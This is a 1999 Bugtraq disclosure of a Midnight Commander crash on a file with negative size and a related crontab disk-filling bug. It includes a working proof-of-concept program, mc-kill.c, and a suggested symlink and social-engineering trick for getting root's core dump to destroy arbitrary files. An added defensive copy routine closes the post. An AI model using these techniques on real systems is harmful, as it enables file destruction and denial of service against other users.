[10231] in bugtraq


Large size file and Midnight/bug in crontab with this file

daemon@ATHENA.MIT.EDU (Maurycy Prodeus)
Thu Apr 15 13:24:47 1999

Date: 	Thu, 15 Apr 1999 06:16:08 -0000
Reply-To: z33d@LIGHTING.ML.ORG
From: Maurycy Prodeus <z33d@LIGHTING.ML.ORG>
To: BUGTRAQ@NETSPACE.ORG

Hello ...
*******************************************************************************
*
* I.  -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
*   Zalewski found this )
*
*******************************************************************************

I.

This time I found another bug in Midnight Commander 4.xx [ I used 4.1.33 ;) ] ...
We can cause a segmentation fault, and if root doesn't lock this, it causes
a core dump ... of course we just make some file in /tmp (?) and if root
reads this file ... his mc creates a core ... yeesss, we can make a symlink to
every file in the system ... and this file will be totally destroyed!
Together with "social engineering", it is dangerous. [ The filename may be, for
example: hacker.tools or sth. ]
What file must we create?
One with a negative size, but really it is a very large size ;-) ( very strange
that even in kernel 2.2.5 it is possible )

Quick test: run this program, then run mc and try to read [ F3 of course,
and for example PageDown ] the file which was created by mc-kill ...

--------- mc-kill.c ------------

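#include <sys/file.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define size -900000   /* negative length handed to ftruncate() */

int main(int argc, char *argv[]) {
  int i;
  if (argc < 2) {
    printf("\nUSAGE : %s filename[and patch] \n\n", argv[0]);
    exit(0);
  }
  /* create the file, then make it readable and writable by everyone */
  fchmod(i = open(argv[1], O_RDWR | O_CREAT, 0600), 0666);
  ftruncate(i, size);
  fsync(i);
  return 0;
}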
------------ end of mc-kill.c ---------------

SOLUTION

NEVER read strange files in MC ...:-)
Hmmm, seriously: lcamtuf [ http://dione.ids.pl ] wrote a kernel module which
does not allow creating symlinks in /tmp ...

II.

If you use the above program ( or /dev/zero :-) ) you may fill a partition ...
When crontab is reading a file, it creates a temp file in /var/spool/cron/
( non-root can't even read this - lcamtuf ). But if it doesn't finish, then it
doesn't delete this temp file ... OK. So, we must give crontab a file with
"infinite" size.

Example : crontab -file-made-by-mc-kill


SOLUTION

It isn't very dangerous.




*******************************************************************************

z33d email : z33d@lighting.ml.org www : z33d.lighting.ml.org

If no rational optimal strategy exists, the optimal strategy
is a random strategy ...
                              - unknown -
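
A defensive counterpart to the behaviour described in parts I and II, as an added example that is not part of the original post and not code from mc or crontab: a reader that refuses oversized or non-regular input before and during the copy, and removes its temporary file on every failure path. The function name `bounded_copy` and the `max_bytes` cap are assumptions made for illustration.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: copy src to dst, refusing anything that is not a
 * regular file or that exceeds max_bytes. If the copy fails after dst was
 * created, dst is unlinked so no partial temporary file stays on disk.
 * Returns 0 on success, -1 on refusal or error. */
int bounded_copy(const char *src, const char *dst, off_t max_bytes)
{
    char buf[4096];
    struct stat st;
    off_t total = 0;
    ssize_t n = 0;
    int ok = 0, out = -1;
    int in = open(src, O_RDONLY);

    if (in < 0)
        return -1;
    /* Early rejection: a sparse file can report a huge st_size while
     * occupying almost no blocks, and /dev/zero is not a regular file. */
    if (fstat(in, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_size < 0 || st.st_size > max_bytes)
        goto done;
    /* O_EXCL makes open() fail if dst already exists, symlinks included. */
    out = open(dst, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (out < 0)
        goto done;
    /* Enforce the cap while reading as well: the file may grow after fstat(). */
    while ((n = read(in, buf, sizeof buf)) > 0) {
        total += n;
        if (total > max_bytes || write(out, buf, (size_t)n) != n)
            break;
    }
    ok = (n == 0);  /* only a clean EOF counts; a break or read error does not */
done:
    close(in);
    if (out >= 0) {
        close(out);
        if (!ok)
            unlink(dst);  /* remove only a file this call created */
    }
    return ok ? 0 : -1;
}
```
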
